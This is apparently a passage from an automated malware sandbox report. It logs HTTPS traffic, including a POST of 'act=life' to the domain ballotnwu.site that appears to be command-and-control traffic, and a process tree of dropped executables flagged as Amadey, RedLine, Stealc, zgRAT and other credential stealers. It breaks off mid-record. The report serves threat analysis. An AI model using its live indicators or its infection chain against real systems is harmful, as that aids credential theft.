                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                          Cache-Control: no-cache
                                                                          Date: Fri, 27 Sep 2024 02:21:50 GMT
                                                                          Content-Length: 34663
                                                                          Connection: close
                                                                          Set-Cookie: sessionid=34544383b789930c74fb87f0; Path=/; Secure; SameSite=None
                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                          2024-09-27 02:21:50 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                          2024-09-27 02:21:50 UTC16384INData Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61
                                                                          Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
                                                                          2024-09-27 02:21:50 UTC3765INData Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70
                                                                          Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.549786104.21.2.13443428C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-27 02:21:50 UTC261OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: ballotnwu.site
                                                                          2024-09-27 02:21:50 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-09-27 02:21:51 UTC774INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=gni7esgijqsck5juvef4203tv4; expires=Mon, 20 Jan 2025 20:08:30 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NOeKYOokIexJUaxQHbaAsnfErhHUYw%2FGYn7qLGqZChAJPpfOttDXr6rVn3mUGAvnVxqNWlg8RelYrTj5Quq%2Bv%2BJS%2BMurH8mmxJcbuBH79IHgU5%2F8vr5TB263LYqT0Hz6XA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c9805c9ec684337-EWR
                                                                          2024-09-27 02:21:51 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                          Data Ascii: aerror #D12
                                                                          2024-09-27 02:21:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:22:19:59
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0xd70000
                                                                          File size:1'973'760 bytes
                                                                          MD5 hash:49A9681922AD571A4A24B42465E5CDC4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2100199009.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2059876359.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:22:20:02
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                          Imagebase:0x6d0000
                                                                          File size:1'973'760 bytes
                                                                          MD5 hash:49A9681922AD571A4A24B42465E5CDC4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2092244359.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2132657383.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:22:20:02
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          Imagebase:0x6d0000
                                                                          File size:1'973'760 bytes
                                                                          MD5 hash:49A9681922AD571A4A24B42465E5CDC4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2097277338.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:22:21:00
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          Imagebase:0x6d0000
                                                                          File size:1'973'760 bytes
                                                                          MD5 hash:49A9681922AD571A4A24B42465E5CDC4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2660197463.0000000005270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:7
                                                                          Start time:22:21:04
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
                                                                          Imagebase:0x320000
                                                                          File size:320'000 bytes
                                                                          MD5 hash:389881B424CF4D7EC66DE13F01C7232A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:22:21:04
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:22:21:04
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0xfa0000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:22:21:07
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
                                                                          Imagebase:0xc30000
                                                                          File size:903'168 bytes
                                                                          MD5 hash:84263AB03B0A0F2B51CC11B93EC49C9F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:22:21:07
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:22:21:08
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0xf00000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:22:21:09
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
                                                                          Imagebase:0xeb0000
                                                                          File size:364'544 bytes
                                                                          MD5 hash:A3EF9920A91B891837705E46BB26DE17
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:22:21:09
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
                                                                          Imagebase:0x980000
                                                                          File size:311'296 bytes
                                                                          MD5 hash:4E60F3FD76D9EAB244F9DC00F7765B0B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:22:21:10
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
                                                                          Imagebase:0x190000
                                                                          File size:425'984 bytes
                                                                          MD5 hash:F5D7B79EE6B6DA6B50E536030BCC3B59
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000000.2751757055.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:22:21:11
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                                                                          Imagebase:0x210000
                                                                          File size:425'984 bytes
                                                                          MD5 hash:F5D7B79EE6B6DA6B50E536030BCC3B59
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000000.2765127201.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.2769327231.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:22:21:12
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          Imagebase:0x210000
                                                                          File size:425'984 bytes
                                                                          MD5 hash:F5D7B79EE6B6DA6B50E536030BCC3B59
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.2770476347.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.3331845995.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          Target ID:19
                                                                          Start time:22:21:12
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
                                                                          Imagebase:0xf50000
                                                                          File size:192'000 bytes
                                                                          MD5 hash:7A02AA17200AEAC25A375F290A4B4C95
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:22:21:17
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000065001\stories.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                                                          Imagebase:0x400000
                                                                          File size:3'247'089 bytes
                                                                          MD5 hash:BB4417D907E43503F714273F1AE9CF44
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:21
                                                                          Start time:22:21:18
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                                                          Imagebase:0x400000
                                                                          File size:708'608 bytes
                                                                          MD5 hash:C8AFA039FC2A7F032512686FB50692DF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:22
                                                                          Start time:22:21:18
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
                                                                          Imagebase:0x400000
                                                                          File size:4'278'784 bytes
                                                                          MD5 hash:7FA5C660D124162C405984D14042506F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:22:21:20
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i
                                                                          Imagebase:0x400000
                                                                          File size:3'117'056 bytes
                                                                          MD5 hash:B19555358F3C9ABC6157B2B7AAB2F658
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Has exited:false

                                                                          Target ID:24
                                                                          Start time:22:21:21
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000254001\penis.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
                                                                          Imagebase:0xca0000
                                                                          File size:419'328 bytes
                                                                          MD5 hash:A21700718C70EC5E787AD373CB72A757
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: ditekSHen
                                                                          Has exited:true

                                                                          Target ID:25
                                                                          Start time:22:21:21
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:22:21:22
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                          Imagebase:0x7ff7e52b0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:27
                                                                          Start time:22:21:24
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
                                                                          Imagebase:0x7c0000
                                                                          File size:321'536 bytes
                                                                          MD5 hash:FF5AFED0A8B802D74AF1C1422C720446
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:22:21:24
